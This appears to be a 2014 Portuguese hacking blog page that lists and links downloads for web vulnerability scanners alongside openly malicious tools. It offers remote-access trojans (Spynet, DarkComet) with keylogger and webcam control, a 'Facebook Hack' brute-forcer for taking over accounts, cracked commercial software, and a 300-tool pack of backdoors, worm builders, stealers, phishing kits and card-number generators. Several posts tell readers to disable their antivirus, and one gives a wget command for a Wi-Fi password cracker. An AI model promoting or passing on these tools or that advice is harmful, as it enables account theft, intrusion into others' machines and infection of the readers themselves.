Ultimas Noticias
Mostrando postagens com marcador Invasões. Mostrar todas as postagens
Mostrando postagens com marcador Invasões. Mostrar todas as postagens

domingo, 16 de março de 2014

Ferramentas para scan de vulnerabilidades web

Explorar vulnerabilidades em sites web é algo muito utilizado por crackers e até por script kiddies, e ataques do tipo SQL Injection (que exploram vulnerabilidades pouco complexas e não requerem muito conhecimento e habilidade) se tornaram comuns hoje em dia.

Confira esta lista de ferramentas que podem lhe ajudar (e muito) a encontrar tais vulnerabilidades em seu site e corrigi-las: 


OWASP ou Open  Web Application  Security  Project é uma organização sem fins lucrativos que está se concentrando em melhorar a segurança das aplicações web, para saber mais sobre OWASP clique aqui . O Proxy Ataque Zed (ZAP) é fácil de usar e integra testes de penetração  com ferramenta para encontrar vulnerabilidades em aplicações web. Ele tem uma funcionalidade de digitalização automática e tem um conjunto de ferramentas que lhe permitem encontrar vulnerabilidade  manualmente.


W3af é um Framework de ataque e Auditoria para Web Application. O objetivo do projeto é criar um quadro para encontrar e explorar vulnerabilidades de aplicações web que é fácil de usar e estender. w3af está trabalhando para se tornar o melhor Open Source Web Framework para exploração em vulnerabilidades web. Ele está disponível no Backtrack 5 também.
Skipfish Web Vulnerability Scanner Tool 

Skipfish é uma  ferramenta automática de  segurança de aplicações web, que foi projetado para  encontrar vulnerabilidade em seu site antes que um cracker possa encontrar e explorá-la. Ele também está disponível no Backtrack 5.


Nikto é um das melhores ferramentas de scanner de vulnerabilidades web open source que está disponível para Linux e vem nativa no  famoso Backtrack. Você pode usá-lo em outra distribuição também, pois ele é um script em perl.


Netsparker é uma ferramenta comercial, que foi projetada para encontrar vulnerabilidades em aplicações web, a versão gratuita do netparker também está disponível para que você possa baixá-lo e pode usar para um teste de penetração rápido em uma aplicação web.


Websecurify é uma ferramenta de sistema operacional que pode ser executado em Windows, Linux e MAC. É a melhor ferramenta para encontrar as vulnerabilidades web comuns que podem causar um grande dano para a aplicação web.

Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Material Hacker 2011 Completo

Descrição: Material Hacker 2011 completo, contendo ferramentas para todo tipo de hacker, desde iniciantes até intermediarios, programas e scripts exclusivos, considerado um dos melhores e mais completo material Hacker disponivel na Internet, produzido pelo Hacker @WorldAnon

Conteudo
-Backdoors
-BOOTNETS e ZUMBIS
-CAMUFLADORES IP
-Scanners CGI
-Criadores de Worms
-Crypters
-DDoS
-Exploiters
-Ferramentas para Cracking
-Ferramentas de Brute Force
-Geradores ( Rg,CPF,Cartão de Crédito etc…)
-Ferramentas IIS
-Injetores de SQL ( INJECTIONS )
-Mass
-Ferramentas para MSN
-Phising
-Programas Fake
-RFI
-Scanners de Vulnerabilidade
-Shell’s
-Sniffers
-Stealers
-Strings
-TROJANS
-Hacks de USB
-XSS
-Videos Tutoriais
-Apostilas Hackers
Nome: Material Hacker Completo 2011
Genero: Hacker
Tamanho: 732 MB
Formato: rar
Mais de 300 ferramentas e aplicativos Hacker


Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Spynet 2.7 Download

Tamanho: 2,698 KB 
Formato: ZIP
Estilo: Trojan

opção1:Download


opção2:Download
Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Acunetix Web Vulnerability Scanner 8 + crack

Scanner de site, em busca de vulnerabilidades. O scanner procura falhas críticas e leves, entre os ataques que ele verifica se o site está vulnerável estão: DDoS, SQL Injection, PHP Injection entre outros. É utilizado tanto por crackers quanto desenvolvedores de site para verificar eventuais falhas. No caso dos desenvolvedores, para corrigi-las, enquanto os crackers, para aproveitá-las e efetuar uma invasão.


Sistema: Windows 2000/XP/Vista 32 Bits/Vista 64 Bits/7/
Tamanho: 17,9 MB  
Mais informações »
Postado por às Nenhum comentário:
Marcadores:

SQL Injection Tool v2.1 Download


Aqui é a mais nova edição da ferramenta de injeção de SQL v2.1. Esta versão tem o  TD incluído no, também com um belo e incredibely rápido, fácil de entender GUI, especialmente feito para aqueles que
são começando em SQL Injection.
Tudo tem sido re-feito, incluindo o código, que é muito mais rápido
e menos confuso. O tamanho do arquivo ter sido aumentado um pouco, devido à
melhoria do código & GUI. O navegador integrado agora está de volta
para quem gostava de usá-lo. Mas você ainda precisará instalar o
ActiveX no seu computador para aqueles que ainda não experimentou ou instalado
ainda.

Melhorias:

Música foram adicionados para ambiente fresco.
Lote de bugs corrigidos com o scanner coluna (especialmente o '0 'count).
Os botões foram corrigidos (eles eram feios por uma razão).

Tome nota: para usar o navegador corretamente, você precisa fazer a varredura
de vulnerabilidade, então, verificar as colunas ou colocá-los por si mesmo
e, em seguida, abrir o navegador e mude o 150 para aumentá-la.
O navegador terá o link gerado no fora colocado automaticamente
e navegue até a página, dando-lhe informações sobre o MySQL
banco de dados a partir do seu site. Tudo deve ser cumprido corretamente, no entanto.

Link para baixar o Mozilla ActiveX para o navegador integrado:
http://www.bradsoft.com/download/MozillaControlInstaller.exe

Desative  o seu anti-vírus,pois ele detecta vírus,mas não é!

Opção 1:Download

Opção 2:Download

Mais informações »
Postado por às Nenhum comentário:
Marcadores:

BackTrack ( BT5R3-GNOME-32 )

Backtrack é um sistema operacional Linux baseado no Ubuntu. É focado em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo  (sem necessidade de instalar em disco),  removível (pendrive), máquinas virtuais ou direto no disco rígido.

Principais aplicativos de BackTrack

Esta  acompanha em torno de 300 programas com o objetivo de testar a segurança do sistema e auxiliar na criação de scripts contra invasões. Vários destes aplicativos utilizam e manipulam protocolos de rede, como o , SMB, , TCP, ICMP, etc. Assim, seus usuários podem simular situações de invasões que acontecem no mundo real, desta maneira, adquirindo mais conhecimento sobre os problemas que podem ocorrer no .

Entre as  mais comuns de BackTrack, podemos citar a procura de portas abertas em , quebra de senhas, disfarce de endereços IP, mapeamento de rede, procura de vulnerabilidades, etc.

Desenvolvimento

A história do sistema é longa e remete a diferentes distribuições Linux. Atualmente baseado no Slackware, com adaptações para a plataforma live-CD, o BackTrack está totalmente otimizado para ser utilizado em testes de invasões. Além disso, tudo é feito em um ambiente pronto e fácil de usar, sem complicações.

Depois de um desenvolvimento estável e novos lançamentos de versões, a equipe de criação do  focou seus esforçoes em adequá-lo ao  mais novo, tornando suas possibilidades mais flexíveis. A versão atual conta com  criadas em módulos separados, tornando os processos ainda mais rápidos.

Ser um aplicativo de qualidade superior sem se tornar complicado para utilização é a chave para o sucesso de um sistema para testes de segurança. Além disso, ele apresenta testes de invasão em metodologias conhecidas e padronizadas, ajudando os profissionais em seu dia-a-dia.

Tamanho : 3.06 
 : ISO


Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Darkcomet RAT v 5.4.1 Legacy download

DarckComet, é uma ferramenta de , que é livre de usar e que permite o controle de várias máquinas ao mesmo tempo, utilizando uma série de funções, como a área de trabalho streaming, controle de , keylogger, webcam de streaming, controle do sistema, micro transmissão etc .DarckComet também é considerado a ferramenta de controle remoto mais  e é considerada como a mais estável do que qualquer outro  profissional. 

Tamanho : 9.52MB


Opção 1:Download

Opção 2:Download
Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Havij Pro 1.16 Portable & Crackeado

Havij é uma ferramenta para testar a injeção de  em um site que tem um bug ou vulnerabilidade nele ,
que ajuda os testadores de penetração de encontrar e explorar vulnerabilidades de injeção SQL em uma página web.
Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Facebook Hack Cracked Download

 : 
Facebook Hack Cracked
Facebook Hack

Tutorial : 
Executar 'Facebook Hack Cracked' 
confirmar e em seguida abra o 'Facebook Hack Setup
( Todos devem saber que programas
 hackers são detectados pelos antivírus , então desativem antes )

O ataque a força  demora geralmente 4 a 6 horas , seja paciente. 
( Não responsabilizamos por contas invadidas )
Opção 1:Download

Opção 2:Download
Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Armitage ( Metasploit )

Com Armitage, você pode facilmente localizar as máquinas que funcionam em uma rede, incluindo a versão do sistema operacional em execução em cada dispositivo. Com essa informação, Armitage fornece uma lista completa dos métodos de ataque com potencial de sucesso para cada versão do sistema operacional. Profissionais de segurança pode executar um método de ataque específico fornecido pela Armitage para ver se a máquina será comprometido, ou eles podem implantar um "Hail Mary" cenário, que, essencialmente, joga todos os métodos de ataque disponível em um dispositivo para determinar o que seria bem sucedida para uma atacante.
 Armitage ainda oferece a capacidade de tirar  de  e teclas de  nas máquinas das vítimas, permitindo uma avaliação mais completa da superfície de ataque de uma organização. Com a ferramenta livre Armitage, realizando avaliações de vulnerabilidade e proteger máquinas vulneráveis nunca foi tão fácil.Metasploit se tornou ao longo dos anos, a melhor estrutura para a realização de testes de penetração em sistemas de rede e infra-estrutura de TI.


Mais informações »
Postado por às Nenhum comentário:
Marcadores:

WIFITE Download ( Invadir Wifi )

WiFite é um aplicativo para quebrar senha de rede  criptografada. Neste caso, todo o  é feito pelo WiFite, você só tem que especificar a rede que deseja quebrar e o programa cuida de tudo. Mas não só isso, ele permite que você faça múltiplos ataques em redes criptografadas simultaneamente com WEP e WPA. Esta é uma ferramenta personalizável para trabalhar de forma autônoma com alguns parâmetros

Plataformas disponíveis : Backtrack 5
, BackBox, BlackBuntu,
Pentoo, Ubuntu 8.10 (BT4R1),
 Ubuntu 10.04, Debian 6, Fedora 16 

INSTALAÇÃO 
 - A primeira é fazer o  WiFite:
wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

 - fazemo-lo executável:
chmod +x wifite.py

Executar:

python wifite.py

ou, para ver uma lista de comandos com informações:

./wifite.py -help


Mais informações »
Postado por às Nenhum comentário:
Marcadores:

Ettercap

Ettercap é um sniffer, interceptador e logger de rede para as LANs. Ele suporta  passiva e ativa dos protocolos ( mesmo que seja códigos como SSH e HTTPS), verificar se você está com a LAN trocada ou não, injetar dados para  a  estabelecida e muito mais.

Ettercap é uma fonte livre e aberta a segurança da rede ferramenta para ataques man-in-the-middle  LAN . Ele pode ser usado para o  de protocolo de rede de análise e de segurança de auditoria . Ele roda em vários Unix-like  , incluindo  ,  OS X , BSD e Solaris , e no  Windows . Ele é capaz de interceptar o tráfego em um segmento de rede, capturando senhas, e realização de escutas ativo contra  de protocolos comuns.
Mais informações »
Postado por às Nenhum comentário:
Marcadores:
Assinar: Postagens (Atom)

Você acha que o Brasil tem condições de Ganhar a copa.

O que você esta achando da copa do mundo.
Grupo :Deep Piracy - Designed By : S.B.T